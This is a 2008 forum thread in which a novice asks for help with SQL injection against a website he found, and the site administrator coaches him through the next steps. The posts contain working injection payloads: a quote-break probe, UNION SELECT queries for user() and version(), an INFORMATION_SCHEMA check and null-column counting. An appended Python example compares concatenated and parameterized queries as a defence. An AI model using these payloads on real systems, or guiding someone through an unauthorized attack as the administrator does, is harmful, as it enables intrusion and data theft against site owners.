ThisisLegal.com

ThisisLegal Forums


#1 2008-05-30 19:22:54

chedda
Member
Registered: 2008-05-30
Posts: 1

Help with sql injection

Ok, I am fairly new at SQL injection and hacking in general. I have found a website that I believe to be vulnerable, but I am still having some issues. So far this is what I have found:

news.php3?id=-1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1''' at line 1: 1064

news.php3?id=-1' UNION/**/ALL/**/SELECT/**/1,user()/*

root@localhost

news.php3?id=-1' UNION/**/ALL/**/SELECT/**/1,version()/*

4.1.20

So I have figured out that it's possibly vulnerable, and the version it's running and the root directory, but I was unsure where to go after that. I read over the tutorial on this website about SQL injection and then tried the following:

news.php3?id=-1' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='users') AND ''='

Access denied for user 'host'@'localhost' to database 'INFORMATION_SCHEMA': 1044

If I understood the tutorial correctly, that command is to attempt to figure out the database's name. So naturally I tried changing the name of the database, and I keep receiving the same error. Is this because I am just not getting the name right, or is that error indicating something else?

Offline

#2 2008-05-31 04:17:54

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: Help with sql injection

Damn, it looks like the information schema is blocked; that always makes things harder. You seem to know quite a lot about SQL already. SQL injections are usually all about guesswork. You can start by getting the number of table columns. Start with

news.php3?id=-1' UNION ALL SELECT null --

then keep adding nulls, e.g.

news.php3?id=-1' UNION ALL SELECT null,null --

until you get an error message. When you get the error, you know the previous was the number of columns the table has. Then we can look at using wildcards (% symbols). I am not a complete expert in this field but I can try.

P.S. Also check out tutorial #18 on this site.


Site admin

Offline
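
An added example, not part of the thread or of the site's code: the inputs quoted in the posts above are run against a string-concatenated query and a parameterized one, to show why the first returns parser errors and changes behaviour with the input while the second does not. SQLite stands in for the MySQL server here, and the `news` table, its columns and the function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; the table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id TEXT, title TEXT)")
    db.execute("INSERT INTO news VALUES ('1', 'Site launched')")
    return db

def fetch_vulnerable(db, news_id):
    # The parameter is pasted into the SQL text, so a quote in it
    # ends the string literal and the rest is parsed as SQL.
    sql = "SELECT id, title FROM news WHERE id = '" + news_id + "'"
    try:
        return ("rows", db.execute(sql).fetchall())
    except sqlite3.Error as exc:
        # Returning the driver error to the client, as the site in the thread does.
        return ("error", str(exc))

def fetch_parameterized(db, news_id):
    # The parameter is bound as a value and is never parsed as SQL.
    sql = "SELECT id, title FROM news WHERE id = ?"
    try:
        return ("rows", db.execute(sql, (news_id,)).fetchall())
    except sqlite3.Error:
        # Generic message for the client; details belong in server-side logs.
        return ("error", "internal error")

# Inputs as quoted in the posts above, plus one ordinary id.
INPUTS = [
    "1",
    "-1'",
    "-1' UNION ALL SELECT null --",
    "-1' UNION ALL SELECT null,null --",
]

def compare(db):
    # For each input, the outcome of both query styles.
    return [(i, fetch_vulnerable(db, i), fetch_parameterized(db, i)) for i in INPUTS]

if __name__ == "__main__":
    for value, vuln, safe in compare(make_db()):
        print(repr(value))
        print("  concatenated: ", vuln)
        print("  parameterized:", safe)
```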
